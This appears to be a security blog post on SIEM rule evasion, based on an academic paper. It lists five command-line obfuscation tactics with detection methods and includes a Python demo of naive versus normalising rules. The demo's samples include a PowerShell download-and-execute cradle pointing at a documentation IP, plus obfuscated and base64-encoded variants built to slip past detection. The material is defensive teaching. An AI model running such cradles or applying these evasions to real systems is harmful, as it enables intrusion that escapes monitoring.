Evading SIEM Rules – Academic Paper

By Threat Analyst

21 November 2023

The recent paper, “You Cannot Escape Me: Detecting Evasions of SIEM Rules in Enterprise Networks”, highlights the ongoing contest between attackers’ evasion tactics and defenders’ efforts to detect them. Security Information and Event Management (SIEM) systems are central to this contest: their detection rules typically match on literal strings in events such as process command lines, and attackers keep finding ways to execute the same action with a command line that the rule’s string no longer matches.

Whilst this deviates from the authors’ own proposal, this blog post delves into the evasion tactics the paper catalogues, the MITRE ATT&CK Tactics, Techniques, and Procedures (TTPs) they correspond to, and possible detection methods for each.

Evasion Tactics and Detection Methods

  1. Insertion
    • Description: Attackers insert characters that the target interpreter ignores, such as extra quotes, cmd.exe carets (^) or additional whitespace, into a command line so that it no longer contains the literal string a rule looks for, while still executing identically.
    • MITRE TTPs: This is command-line obfuscation, Obfuscated Files or Information (T1027), specifically Command Obfuscation (T1027.010). It is not Hidden Window (T1564.003), which concerns hiding a process’s window rather than altering its command line.
    • Detection Method: Normalise command lines before matching by removing or standardising the inserted characters. The normalisation must mirror exactly what the interpreter ignores; stripping more than that merges distinct commands and produces false positives.
  2. Substitution
    • Description: Substitution replaces terms with synonymous ones, such as an abbreviated or alternative spelling of an equivalent command-line argument (the same parameter in a different letter case, or a short alias of a long parameter name).
    • MITRE TTPs: Obfuscated Files or Information (T1027), specifically Command Obfuscation (T1027.010). It is unrelated to Process Injection (T1055).
    • Detection Method: Canonicalise synonymous parameter names and argument variations (aliases, abbreviations, letter case) to one form before the rule is applied, so that the rule matches the meaning of the argument rather than one spelling of it.
  3. Omission
    • Description: Here, parts of a command line that are not necessary for the attack’s execution are omitted. The evasion works because the rule over-specifies: it requires a token the attacker can simply leave out.
    • MITRE TTPs: No distinct ATT&CK technique; it exploits a weakness in the rule rather than adding anything to the command, and is best grouped with Command Obfuscation (T1027.010).
    • Detection Method: Write rules that match only on the tokens essential to the attack, and review existing rules for optional tokens that an attacker could drop.
  4. Reordering
    • Description: Changing the order of arguments in a command line, which breaks any rule that matches on a fixed sequence of arguments.
    • MITRE TTPs: Obfuscated Files or Information (T1027), specifically Command Obfuscation (T1027.010).
    • Detection Method: Parse the command line into an order-independent representation (for example a set of parameter/value pairs) and match rules against that, so that argument order cannot affect the result.
  5. Recoding
    • Description: Encoding or altering arguments so that they are semantically the same but textually different, such as a numerical IP address instead of a domain name, or a script passed base64-encoded rather than in clear text.
    • MITRE TTPs: Obfuscated Files or Information (T1027), specifically Command Obfuscation (T1027.010).
    • Detection Method: Decode encoded arguments and resolve equivalent representations to a canonical form before applying pattern matching.
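
As an added example (not code from the paper or from this post’s author), the Python below models a single rule against constructed command lines that are evaded by each of the five tactics above. The rule written as a literal substring match misses every variant; the rule applied to a normalised form (carets and quote pairs stripped, parameter names canonicalised, parameters treated as an unordered set, -EncodedCommand decoded, and only the essential tokens required) catches all of them. The sample command lines, the parameter alias table and the IP address are constructed for illustration, and the Recoding sample uses a base64-encoded command rather than the numeric-IP case in the text.

```python
import base64
import re
import shlex

# Constructed samples and an illustrative alias table; none of this is taken
# from the paper. 198.51.100.7 is a documentation address, not a real host.

# Canonical names for PowerShell host parameters that accept abbreviated or
# synonymous spellings. Assumption: an illustrative subset, not an exhaustive
# table of what powershell.exe accepts.
FLAG_ALIASES = {
    "nop": "noprofile", "noprofile": "noprofile",
    "ep": "executionpolicy", "ex": "executionpolicy", "exec": "executionpolicy",
    "executionpolicy": "executionpolicy",
    "w": "windowstyle", "windowstyle": "windowstyle",
    "c": "command", "command": "command",
    "e": "encodedcommand", "ec": "encodedcommand", "enc": "encodedcommand",
    "encodedcommand": "encodedcommand",
}
VALUED = {"executionpolicy", "windowstyle"}  # parameters followed by a value

PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLES = {
    "baseline":     f'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "{PAYLOAD}"',
    # Insertion: cmd.exe carets, empty quote pairs and extra whitespace.
    "insertion":    f'powershell.exe  -NoProfile   -Execution^Policy By""pass -Command "{PAYLOAD}"',
    # Substitution: abbreviated parameter names and different letter case.
    "substitution": f'powershell.exe -nop -ep bypass -c "{PAYLOAD}"',
    # Omission: -NoProfile is not needed for the attack, so it is left out.
    "omission":     f'powershell.exe -ExecutionPolicy Bypass -Command "{PAYLOAD}"',
    # Reordering: same parameters, different order.
    "reordering":   f'powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "{PAYLOAD}"',
    # Recoding: the script is passed base64/UTF-16LE via -EncodedCommand.
    "recoding":     f"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {ENCODED}",
}

# A literal-substring rule: fixed order, fixed spelling, and it requires a
# token (-NoProfile) that the attack does not actually need.
NAIVE_PATTERN = re.compile(r"-NoProfile -ExecutionPolicy Bypass -Command .*DownloadString")


def naive_rule(cmdline: str) -> bool:
    return bool(NAIVE_PATTERN.search(cmdline))


def normalize(cmdline: str) -> dict:
    """Reduce a command line to (exe, parameter set, decoded script text)."""
    # Insertion: drop cmd.exe escape carets and collapse whitespace; shlex then
    # strips quote characters sprinkled inside tokens (By""pass -> Bypass).
    # shlex is a POSIX tokenizer: adequate for these samples, but a production
    # normaliser needs Windows quoting rules (backslashes are escapes here).
    tokens = shlex.split(re.sub(r"\s+", " ", cmdline.replace("^", "")).strip())
    exe = re.split(r"[\\/]", tokens[0])[-1].lower()
    params, payload = set(), ""
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if not tok or tok[0] not in "-/":
            i += 1
            continue
        name = FLAG_ALIASES.get(tok[1:].lower(), tok[1:].lower())  # Substitution
        if name == "command":                 # everything after -Command is code
            payload = " ".join(tokens[i + 1:])
            break
        if name == "encodedcommand" and i + 1 < len(tokens):          # Recoding
            payload = base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            break
        if name in VALUED and i + 1 < len(tokens):
            params.add((name, tokens[i + 1].lower()))
            i += 2
            continue
        params.add((name, ""))
        i += 1
    # Reordering: a set of (name, value) pairs has no order left to evade.
    return {"exe": exe, "params": frozenset(params), "payload": payload.lower()}


def robust_rule(cmdline: str) -> bool:
    """Match on the normalised form and only on tokens essential to the attack
    (no -NoProfile requirement), so Omission cannot break the rule."""
    n = normalize(cmdline)
    return (n["exe"] in {"powershell.exe", "pwsh.exe"}
            and ("executionpolicy", "bypass") in n["params"]
            and "downloadstring" in n["payload"])


def evaluate() -> dict:
    """Map each sample name to (naive_rule hit, robust_rule hit)."""
    return {name: (naive_rule(c), robust_rule(c)) for name, c in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, robust) in evaluate().items():
        print(f"{name:13s} naive={naive!s:5s} robust={robust}")
```

Running the block prints one line per sample; only the baseline is caught by both rules, the five evaded variants only by the normalising rule. Two caveats carry over to real deployments: the normaliser must strip exactly what the target interpreter ignores (shlex is POSIX, and Windows process creation applies different quoting rules), and a normaliser only defeats the evasion types its author anticipated, which is the limitation that motivates the paper’s learning-based complement to static rules.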

General Detection Strategies

To counter these evasion tactics, organisations should not rely on literal string matching alone but combine several detection strategies:

  1. Machine Learning: Training models on historical events so that command lines which resemble known rule matches, but do not match them literally, are flagged as anomalies.
  2. Rule-Based Detection Enhancement: Continuously updating SIEM rules to cover known evasion variants, and normalising events before rules are applied so that one rule covers many spellings of the same command.
  3. Behavioral Analysis: Monitoring behaviors indicative of malicious activity.
  4. Anomaly Detection: Identifying deviations from normal network or system activity.
  5. Active Directory Monitoring: Monitoring logs for patterns such as unusual login times or locations.
  6. Endpoint Detection and Response (EDR): Detecting and responding to suspicious activities on endpoints.

The sophistication and variety of attackers’ evasion tactics necessitate a multifaceted approach to detection. A combination of updated and normalised SIEM rules, machine learning, behavioural analysis, and endpoint telemetry is essential for enhancing an organisation’s defensive capabilities against these tactics.

Further Reading